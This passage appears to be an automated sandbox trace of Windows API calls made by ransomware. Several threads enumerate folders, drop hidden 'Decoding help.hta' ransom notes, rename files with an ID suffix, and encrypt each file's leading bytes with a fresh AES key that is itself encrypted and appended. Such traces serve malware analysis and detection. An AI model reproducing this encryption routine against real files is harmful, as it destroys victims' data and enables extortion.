dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x568 [0055.272] CreateFileMappingA (hFile=0x568, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x380 [0055.272] CryptAcquireContextA (in: phProv=0x103cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x103cfcec*=0x34494f0) returned 1 [0059.615] CryptGenKey (in: hProv=0x34494f0, Algid=0x6610, dwFlags=0x1, phKey=0x103cfce8 | out: phKey=0x103cfce8*=0x5e3670) returned 1 [0059.615] CryptExportKey (in: hKey=0x5e3670, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x103cfbe4, pdwDataLen=0x103cfce4 | out: pbData=0x103cfbe4*, pdwDataLen=0x103cfce4*=0x2c) returned 1 [0059.615] MapViewOfFile (hFileMappingObject=0x380, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x30df0000 [0059.624] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x103cfbe4*, pdwDataLen=0x103cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x103cfbe4*, pdwDataLen=0x103cfcf8*=0x100) returned 1 [0059.624] CryptEncrypt (in: hKey=0x5e3670, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x30df0000, pdwDataLen=0x103cfce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x30df0000*, pdwDataLen=0x103cfce4*=0x100000) returned 1 [0059.786] UnmapViewOfFile (lpBaseAddress=0x30df0000) returned 1 [0059.798] CloseHandle (hObject=0x380) returned 1 [0059.798] CryptDestroyKey (hKey=0x5e3670) returned 1 [0059.798] CryptReleaseContext (hProv=0x34494f0, dwFlags=0x0) returned 1 [0059.798] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.799] WriteFile (in: hFile=0x568, lpBuffer=0x103cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x103cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x103cfbe4*, lpNumberOfBytesWritten=0x103cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.280] WriteFile (in: hFile=0x568, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x103cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x103cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.280] CloseHandle (hObject=0x568) returned 1 [0061.281] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.284] FindNextFileW (in: hFindFile=0x5d8090, lpFindFileData=0x103cfd30 | out: lpFindFileData=0x103cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8de7800, ftCreationTime.dwHighDateTime=0x1c2a173, ftLastAccessTime.dwLowDateTime=0x5253df30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe8de7800, ftLastWriteTime.dwHighDateTime=0x1c2a173, nFileSizeHigh=0x0, nFileSizeLow=0x3400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.stdformat.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0061.284] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*" [0061.284] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*") returned 71 [0061.284] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Decoding help.hta" [0061.284] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\decoding help.hta")) returned 0x1 [0061.284] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.stdformat.dll") returned -1 [0061.284] lstrlenW (lpString="Microsoft.stdformat.dll") returned 23 [0061.284] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*" [0061.284] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*.*") returned 71 [0061.284] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\", lpString2="Microsoft.stdformat.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll" [0061.284] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll" [0061.284] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0061.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\microsoft.stdformat.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\microsoft.stdformat.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.285] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\microsoft.stdformat.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x568 [0061.285] CreateFileMappingA (hFile=0x568, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xdfc [0061.285] CryptAcquireContextA (phProv=0x103cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 215 os_tid = 0x818 [0040.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\*.*", lpFindFileData=0x714fd30 | out: lpFindFileData=0x714fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5e30 [0040.501] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.502] FindNextFileW (in: hFindFile=0x5a5e30, lpFindFileData=0x714fd30 | out: lpFindFileData=0x714fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.502] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.502] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.502] FindNextFileW (in: hFindFile=0x5a5e30, lpFindFileData=0x714fd30 | out: lpFindFileData=0x714fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.502] lstrcpyW (in: lpString1=0x10fef658, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\*.*") returned="\\\\?\\C:\\Users\\Public\\Documents\\*.*" [0040.502] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Documents\\*.*") returned 33 [0040.502] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Public\\Documents\\Decoding help.hta" [0040.502] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\Decoding help.hta" (normalized: "c:\\users\\public\\documents\\decoding help.hta")) returned 0xffffffff [0040.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\Decoding help.hta" (normalized: "c:\\users\\public\\documents\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0040.792] WriteFile (in: hFile=0x330, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x714fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x714fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.793] CloseHandle (hObject=0x330) returned 1 [0040.793] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.243] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0041.243] lstrlenW (lpString="desktop.ini") returned 11 [0041.243] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\*.*") returned="\\\\?\\C:\\Users\\Public\\Documents\\*.*" [0041.243] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Documents\\*.*") returned 33 [0041.243] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini" [0041.243] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini" [0041.243] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0041.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\documents\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\documents\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc [0041.244] CreateFileMappingA (hFile=0x3bc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x328 [0041.244] CryptAcquireContextA (in: phProv=0x714fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x714fcec*=0x34494f0) returned 1 [0043.831] CryptGenKey (in: hProv=0x34494f0, Algid=0x6610, dwFlags=0x1, phKey=0x714fce8 | out: phKey=0x714fce8*=0x5d8010) returned 1 [0043.831] CryptExportKey (in: hKey=0x5d8010, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x714fbe4, pdwDataLen=0x714fce4 | out: pbData=0x714fbe4*, pdwDataLen=0x714fce4*=0x2c) returned 1 [0043.831] MapViewOfFile (hFileMappingObject=0x328, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100) returned 0x4460000 [0044.105] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x714fbe4*, pdwDataLen=0x714fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x714fbe4*, pdwDataLen=0x714fcf8*=0x100) returned 1 [0047.042] CryptEncrypt (in: hKey=0x5d8010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4460000*, pdwDataLen=0x714fce4*=0x100, dwBufLen=0x100 | out: pbData=0x4460000*, pdwDataLen=0x714fce4*=0x100) returned 1 [0047.042] UnmapViewOfFile (lpBaseAddress=0x4460000) returned 1 [0047.043] CloseHandle (hObject=0x328) returned 1 [0047.043] CryptDestroyKey (hKey=0x5d8010) returned 1 [0047.043] CryptReleaseContext (hProv=0x34494f0, dwFlags=0x0) returned 1 [0047.044] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.044] WriteFile (in: hFile=0x3bc, lpBuffer=0x714fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x714fcf8, lpOverlapped=0x0 | out: lpBuffer=0x714fbe4*, lpNumberOfBytesWritten=0x714fcf8*=0x100, lpOverlapped=0x0) returned 1 [0047.605] WriteFile (in: hFile=0x3bc, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x714fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x714fcf8*=0x500, lpOverlapped=0x0) returned 1 [0047.605] CloseHandle (hObject=0x3bc) returned 1 [0047.607] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0051.150] FindNextFileW (in: hFindFile=0x5a5e30, lpFindFileData=0x714fd30 | out: lpFindFileData=0x714fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0051.150] lstrcmpW (lpString1=".", lpString2="My Music") returned -1 [0051.150] lstrcmpW (lpString1="..", lpString2="My Music") returned -1 [0051.150] lstrcmpiW (lpString1="windows", lpString2="My Music") returned 1 [0051.155] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\*.*") returned="\\\\?\\C:\\Users\\Public\\Documents\\*.*" [0051.155] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Documents\\*.*") returned 33 [0051.155] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\", lpString2="My Music" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Music") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Music" [0051.155] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Music", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*.*") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*.*" [0051.155] GlobalMemoryStatus (in: lpBuffer=0x714fd10 | out: lpBuffer=0x714fd10) [0051.155] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a6a0048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3e8 [0051.156] CloseHandle (hObject=0x3e8) returned 1 [0051.156] FindNextFileW (in: hFindFile=0x5a5e30, lpFindFileData=0x714fd30 | out: lpFindFileData=0x714fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0051.156] lstrcmpW (lpString1=".", lpString2="My Pictures") returned -1 [0051.156] lstrcmpW (lpString1="..", lpString2="My Pictures") returned -1 [0051.156] lstrcmpiW (lpString1="windows", lpString2="My Pictures") returned 1 [0051.159] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\*.*") returned="\\\\?\\C:\\Users\\Public\\Documents\\*.*" [0051.159] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Documents\\*.*") returned 33 [0051.159] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\", lpString2="My Pictures" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures" [0051.159] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*.*") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*.*" [0051.159] GlobalMemoryStatus (in: lpBuffer=0x714fd10 | out: lpBuffer=0x714fd10) [0051.159] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a6b80b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3e8 [0051.160] CloseHandle (hObject=0x3e8) returned 1 [0051.160] FindNextFileW (in: hFindFile=0x5a5e30, lpFindFileData=0x714fd30 | out: lpFindFileData=0x714fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0051.160] lstrcmpW (lpString1=".", lpString2="My Videos") returned -1 [0051.160] lstrcmpW (lpString1="..", lpString2="My Videos") returned -1 [0051.160] lstrcmpiW (lpString1="windows", lpString2="My Videos") returned 1 [0051.163] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\*.*") returned="\\\\?\\C:\\Users\\Public\\Documents\\*.*" [0051.163] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Documents\\*.*") returned 33 [0051.163] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\", lpString2="My Videos" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Videos") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Videos" [0051.163] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Videos", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*.*") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*.*" [0051.163] GlobalMemoryStatus (in: lpBuffer=0x714fd10 | out: lpBuffer=0x714fd10) [0051.163] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a6d0118, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3e8 [0051.164] CloseHandle (hObject=0x3e8) returned 1 [0051.164] FindNextFileW (in: hFindFile=0x5a5e30, lpFindFileData=0x714fd30 | out: lpFindFileData=0x714fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0051.164] FindClose (in: hFindFile=0x5a5e30 | out: hFindFile=0x5a5e30) returned 1 Thread: id = 216 os_tid = 0x814 [0040.507] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*", lpFindFileData=0x1050fd30 | out: lpFindFileData=0x1050fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8910 [0042.052] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.052] FindNextFileW (in: hFindFile=0x5d8910, lpFindFileData=0x1050fd30 | out: lpFindFileData=0x1050fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80340916, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.052] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.052] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.053] FindNextFileW (in: hFindFile=0x5d8910, lpFindFileData=0x1050fd30 | out: lpFindFileData=0x1050fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Active.GRL", cAlternateFileName="")) returned 1 [0042.053] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*" [0042.053] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*") returned 35 [0042.053] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Decoding help.hta" [0042.053] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\mf\\decoding help.hta")) returned 0xffffffff [0042.053] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\mf\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x508 [0042.053] WriteFile (in: hFile=0x508, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1050fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1050fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.054] CloseHandle (hObject=0x508) returned 1 [0042.054] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.054] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Active.GRL") returned 1 [0042.054] lstrlenW (lpString="Active.GRL") returned 10 [0042.054] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*" [0042.054] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*.*") returned 35 [0042.054] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\", lpString2="Active.GRL" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" [0042.054] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" [0042.054] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL.[ID]g9uZrLhJaygpwRm1[ID]" [0042.055] MoveFileW 